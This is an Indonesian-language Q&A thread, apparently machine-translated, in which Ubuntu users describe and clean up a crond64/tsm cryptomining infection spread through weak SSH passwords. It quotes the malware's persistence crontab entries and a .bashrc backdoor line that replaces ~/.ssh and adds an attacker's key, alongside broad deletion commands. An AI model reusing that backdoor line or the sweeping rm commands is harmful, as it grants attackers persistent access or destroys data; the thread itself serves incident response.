virus crond64 / tsm di Ubuntu

14

Baru-baru ini saya perhatikan server rumah saya menjadi sangat lambat. Semua sumber daya dimakan oleh dua proses: crond64dan tsm. Meskipun saya berulang kali membunuh mereka, mereka terus muncul berulang kali.

Pada saat yang sama, ISP saya memberi tahu saya tentang penyalahgunaan yang berasal dari alamat IP saya:

==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]

Saya mendapat informasi dari situs web ini bahwa saya mungkin memiliki virus. Saya menjalankan Sophos AV memindai seluruh hard drive saya dan memang menemukan beberapa virus di dalamnya /tmp/.mountfs/.rsync. Jadi saya menghapus seluruh folder dan berpikir ini dia. Tapi itu terus datang kembali sesudahnya. Kemudian saya memeriksa file cron pengguna /var/spool/cron/crontabs/kodi(virus itu berjalan menggunakan pengguna server media kodi saya), yang terlihat seperti ini:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb  3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1

Sepertinya, virus mengaktifkan kembali dirinya sendiri sesekali dari direktori lain. Isi direktori itu adalah:

>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d  /home/kodi/.ttp/dir2.dir

/home/kodi/.ttp/a:
a  bash.pid  config.txt  crond32  crond64  cronda  crondb  dir.dir  pools.txt  run  stop  upd

/home/kodi/.ttp/b:
a  dir.dir  rsync  run  stop  sync

/home/kodi/.ttp/c:
aptitude  dir.dir  go  ip  lib  n  p  run  slow  start  stop  tsm  tsm32  tsm64  v  watchdog

Saya menghapus semua file ini dan entri di crontab dan berharap dengan ini, masalahnya selesai. Namun, saya akan tertarik dengan virus apa ini, bagaimana saya dapat menangkapnya (mungkin terhubung ke Kodi) dan apa yang dapat saya lakukan untuk mencegahnya. Untungnya, itu berjalan hanya dari pengguna dengan hak terbatas, tetapi masih menjengkelkan untuk dihadapi.


EDIT

Meskipun saya tampaknya menghapus semua sisa-sisa virus ini (saya juga menghapus seluruh folder tmp), virus terus datang kembali. Saya menyadari bahwa ada sebuah pintu masuk ~/.ssh/authorized_hosts, yang tentunya tidak saya tempatkan. Ini menjelaskan bagaimana virus dapat ditanam kembali berulang kali. Saya menghapus entri, menonaktifkan login untuk pengguna itu, menonaktifkan login kata sandi (hanya passkey), dan menggunakan port non-standar sekarang.

Saya juga melihat upaya login berulang di server saya dengan nama pengguna acak, mungkin oleh beberapa jenis bot (log tampak sangat mirip dengan yang diluncurkan dari IP saya, dikirim kepada saya oleh ISP saya). Saya kira itulah cara komputer saya terinfeksi sejak awal.

erik
sumber
4
Ingatlah bahwa jika Anda telah diretas sekali, kemungkinan ada hal lain di disk yang terinfeksi atau dilanggar. Anda mungkin harus meniup sistem dan membangunnya kembali. Virus sangat jarang hanya mempengaruhi satu aplikasi dan biasanya menyebar di seluruh disk.
Thomas Ward
Saya setuju! jika seseorang masuk ke sistem Anda menghapus sistem dan mengembalikan cadangan sistem
Rinzwind
Tentu, ini akan menjadi solusi hemat. Tetapi saya baru saja menginstal ulang sistem ini dan tidak ingin menginstalnya kembali tanpa memahami apa yang telah terjadi. Dengan menyalin file di atas, ini bisa saja mulai lagi dan saya hanya akan membuang waktu saya.
erik
Kemungkinan, sistem Anda dilanggar maka bagaimana virus terus terinfeksi ulang. Saya akan nuke sistem dan memulai dari awal.
Thomas Ward
1
Saya juga menemukan infeksi ke dalam file .bashrc pengguna: cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~. Saya baru saja melakukan cp /etc/skel/.bashrc /home/mycompromiseduser/untuk menghapusnya.
letsjump

Jawaban:

6

Saya memiliki hal yang sama. Layanan menginstal rsync dan mendapatkan beberapa file. Saya menemukan dota.tar.gzfile di folder pengguna.

  1. tolak port 22 keluar di firewall (mis. ufw deny out 22)
  2. pkill -KILL -u kodi (ini membunuh semua proses yang dijalankan kodi pengguna)
  3. deluser kodi
  4. hapus userhome
  5. hapus rsync (saya tidak menggunakan ini)
  6. menghapus /tmp/.mountfs*

Harap perhatikan ini mungkin akan merusak barang-barang untuk kodi. Alih-alih menghapus seluruh rumah pengguna, Anda mungkin hanya dapat menghapus dota.tar.gz(jika ada) dan .ttpfolder (jangan lupa untuk membersihkan crontab!)

Setelah reboot saya tidak melihat koneksi keluar lagi (periksa dengan:

netstat -peanut | grep 22

Infeksi terjadi melalui pengguna dengan kata sandi yang lemah (akun kodi dengan kata sandi standar mungkin?)

Sjors Nijhuis
sumber
1

Saya memiliki malware yang sama. Entri dilakukan melalui kata sandi pengguna yang tidak disimpan melalui ssh (port non-default), terdeteksi dan dihapus setelah sekitar 24 jam.

Dalam kasus saya, menghapus crontab pengguna, rm -rdf /tmp/.*, rm -rdf /home/user/.*, killall -u usersudah cukup.

terakhir
sumber
1

Punya benda ini hari ini. Saya telah memeriksa sistem dan menemukan sistem saya memiliki jejak selama sekitar satu bulan dan saya belum menyadari bahwa benda ini ada di sana sampai ISP saya memberi tahu saya.

Malware datang melalui pengguna yang tidak aman dengan kata sandi yang lemah. Dalam kasus saya itu adalah pengguna timemachine. Log penetrasi tampak seperti ini.

98341:Dec 23 23:45:36 fileserver sshd[23179]: Accepted password for timemachine from 46.101.149.19 port 45573 ssh2

Ini adalah penambang XMRIG dan eksploit yang memindai IP lain untuk kelemahan yang sama. Jadi, satu mesin dapat menginfeksi puluhan lainnya. Anda dapat melihat laporan MS tentang serangan siber ini .

Perlindungan paling efektif dari serangan semacam ini adalah memasang fail2bandi server Anda, membatasi akses ssh dengan ufw, dan menggunakan ACL daftar putih untuk sistem yang dapat mengakses SSH di server Anda.

Savrulin Romawi
sumber
0

Dalam kasus saya, sumber infeksi adalah pengguna yang tidak mengubah kata sandi yang tidak aman sejak saya membuat akunnya (tentu saja saya menyuruhnya). Server saya mungkin ada di beberapa daftar: saya mendapatkan sekitar 1.000 larangan seminggu dari fail2ban (coba 4 kali dengan pengguna atau kata sandi yang salah dan diblokir selama sebulan)

Sjors Nijhuis
sumber
0

Ini adalah solusi saya (juga dinamai sebagai malware penambangan crypo):

  1. pill pekerjaan crontab
  2. bersihkan apa pun deskripsi pekerjaan crontab ini yang menunjuk ke yaitu: /home/xxx/.ttp/a/upd>/dev/null 2> & 1
  3. hapus /tmp/.xxx/.rsync/c/aptitude>/dev/null 2> & 1
  4. yang paling penting (saya butuh waktu lama untuk sampai ke sana), kalau tidak akan terus datang kembali: jalankan crontab -e (untuk pengguna ini) Anda akan menemukan pekerjaan crontab di atas sana, hapus semuanya, simpan semuanya.
  5. ubah nomor port.
Jack Ma
sumber